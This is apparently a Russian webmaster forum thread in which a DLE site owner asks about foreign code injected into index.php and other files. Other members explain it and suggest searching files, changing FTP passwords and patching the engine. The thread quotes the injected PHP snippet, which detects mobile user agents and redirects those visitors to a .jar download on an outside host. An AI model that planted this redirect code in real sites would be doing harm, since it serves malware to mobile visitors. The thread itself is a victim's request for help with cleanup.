Помощь Посторонний код в файле index.php

[solt]

В файле index.php нашел посторонний код:

if (! $user_group[$member_id['user_group']]['allow_admin']) $config['admin_path'] = "";
	$ua = str_replace('windows ce', '', strtolower($_SERVER['HTTP_USER_AGENT']));
		 if 
		(strpos($ua, 'windows nt') !== false ||
		strpos($ua, 'bsd') !== false ||
		strpos($ua, 'x11') !== false ||
		strpos($ua, 'unix') !== false ||
		strpos($ua, 'macintosh') !== false ||
		strpos($ua, 'macos') !== false
		){
		}
		##
		else{
			header("Location: http://wap-files.ru/x/52/14otkritki.jar");
			exit();
		}

Заметил совсем случайно. С помощью сервиса Liex.ru на двух сайта (размещены на одном аккаунте и на одном хостинге!) статьи (размещенные у меня!) стали массово уходить в статус "Ошибка" с комментарием:

14.02.2011 07:28 Не пройдена Редирект на домен Для просмотра ссылки Войди или Зарегистрируйся с домена Для просмотра ссылки Войди или Зарегистрируйся запрещен!

На втором сайте точно такой же код вот только ссылка ведет на др. файл Для просмотра ссылки Войди или Зарегистрируйся
П.С. Версии движка 9.0 и 8.2 все Для просмотра ссылки Войди или Зарегистрируйся обновлялись вовремя!
П.С. Что обозначает данный код, и в каких еще файлах можно искать части кода. По запросу wap-files.ru больше не в каких файлах не выдает!

 

[failometr]

Сделай поиск по содержимому файлов, ищи текст "wap-files.ru"
Код редиректит всех, у кого useragent браузера не содержит тексты:
windows nt
bsd
unix
macintosh
macos
Одним словом - только мобильные клиенты. Если с мобильника зайти на твой сайт, то должно редиректнуть по ссылке

Для просмотра скрытого содержимого вы должны войти или зарегистрироваться.

А еще запихни в хайды все ссылки в своем посте.

 

[Dr.Sheff]

Напиши хостеру, смени пароль ФТП.

 

[solt]

Вот еще ужасная статистика по сайтам которые размешены на этом аккаунте:

На падение трафика из за праздника (14 февраля) не похоже, да и конкурентов проверял у них все в норме!
П.С. Вредоносный код убрал, посмотрим может быть еще все вернется на свои места.

Сделай поиск по содержимому файлов, ищи текст "wap-files.ru"

Как писал выше, по содержимому файлов всего сайта данное слово не встречается больше не где.
Похоже на скрипт, т.к. дата последнего редактирования файлов index.php у всех разная (1-й - 5.12.10, 2-й 10.11.10, и 3-й 17.10.10) а проблема в Liex.ru начались на днях. А вчера вот еще и падение трафика.

Одним словом - только мобильные клиенты. Если с мобильника зайти на твой сайт, то должно редиректнуть по ссылке

А вот тут стоит задуматься, т.к. сайты именно мобильной тематики, получается код внедрен целесообразного на сайт, т.е. прошел выборку...

 

[o_nix]

solt
это подгрузка вируса...

по крайней мере мой nod32 воспринимает как "множественные угрозы", удалён изолирован и тп ...
так что падение трафика вполне может быть.

можеш попасть в блек листы браузеров и антивирусов и тогда ваще траф пропадёт а при переходе с поисковика пользователю будет показываться сообщение что этот сайт может нанести вашему компьютеру вред.

вычищай и латай DLE пока не поздно.

 

[DMS]

А у кого хостишься и как давно? помимо защиты dle и смены паролей походу нужно задуматься о смене хостера

 

[solt]

вычищай и латай DLE пока не поздно.

index.php очистил в туже минуту как нашел. Проверил папки на фтп на наличие посторонних файлов - файлов нет... А вот проверять код всех файлов не по силам ....
Что касается латок, то все дыры закрывались как только о них упоминали на офф. сайте!

это подгрузка вируса...
по крайней мере мой nod32 воспринимает как "множественные угрозы", удалён изолирован и тп ...
так что падение трафика вполне может быть.

У меня при переходе по ссылке браузер выдает сообщение:

РАЗРЕШЕНО ТОЛЬКО С МОБИЛЬНЫХ!

И нод 32 не на что не ругается !

А у кого хостишься и как давно? помимо защиты dle и смены паролей походу нужно задуматься о смене хостера

Для просмотра ссылки Войди или Зарегистрируйся на шаред хостинг с апреля 2010 года.

 

[Roben]

а это что такое в index.php
в php полный ноль, но по этим словам $tpl->copy_template скопировали шаб, или что?
и вообще как можно всякую х...ь прописать в index.php

require_once ROOT_DIR . '/engine/modules/imageview.php';
if (strpos ( $tpl->copy_template, "{custom" ) !== false) {
	$tpl->copy_template = preg_replace ( "#\\{custom category=['\"](.+?)['\"] template=['\"](.+?)['\"] aviable=['\"](.+?)['\"] from=['\"](.+?)['\"] limit=['\"](.+?)['\"] cache=['\"](.+?)['\"]\\}#ies", "custom_print('\\1', '\\2', '\\3', '\\4', '\\5', '\\6', '{$dle_module}')", $tpl->copy_template );
}

 

[solt]

Тут чет серьезно, простая смена паролей на фтп не помогает, и не каких "левых" файлов на фтп не нашел.
А ситуация такая:
Вчера опять заметил этот код в index.php - удалил. А сегодня он уже появился в файле базы данных dbconfig.php - на всех трех сайтах ...
Объясните как такое может быть:

В файле вчера или сегодня ночью были произведены измены кода, а на дате последнего редактирования файла это не отобразилось?

Через ~4 часа вредоносный год появился в другом файле....
Блин это уже не выносимо... Теперь этот фрагмент кода добавился в config.php. Так же как и в предыдущий раз дата последнего редактирования у файла при этом не изменилась! Это о чем говорит????

 

[solt]

Этот паразит совсем совести лишился . На двух сайта уже этот код разместил в директориях:

\engine\engine.php
\language\Russian\website.lng

А на третьем сайте по прежнему в:

\engine\data\dbconfig.php

Ток что то он там еще подкрутил, т.к. стоит только исправить/очистить файл от его кода, проходит секунда - две и этот код возвращается!

П.С. Объясните пожалуйста как его вредоносный код появляется в файлах и при этом не меняется дата последнего редактирования???